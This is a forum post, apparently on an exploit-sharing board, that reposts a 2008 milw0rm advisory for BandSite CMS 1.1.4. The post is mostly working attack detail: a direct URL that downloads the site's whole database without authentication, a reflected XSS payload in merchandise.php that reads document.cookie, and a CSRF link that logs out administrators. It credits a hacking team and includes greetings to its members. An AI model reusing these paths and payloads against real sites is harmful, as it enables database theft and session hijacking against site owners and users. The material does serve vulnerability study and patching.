Jump to content
SirGod

BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnera

By SirGod, in Exploituri

Recommended Posts

SirGod Contributor

SirGod

Posted
Posted 
###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod                         
[+] MorTal TeaM                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################

[+] Arbitrary Download Database

Go to

   [url]http://localhost/[/url][Path]/adminpanel/phpmydump.php

and the download will begin ( database.sql ) .


[+] Cross Site Scripting

    [url]http://localhost/[/url][Path]/merchandise.php?type=[XSS]
    [url]http://localhost/[/url][Path]/merchandise.php?type=<script>alert(document.cookie)</script>


[+] Cross Site Request Forgery

 If a logged in user with administrator privilegies click the following url he will be logged out.

    [url]http://localhost/[/url][Path]/adminpanel/logout.php


###########################################################################

# milw0rm.com [2008-08-21]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...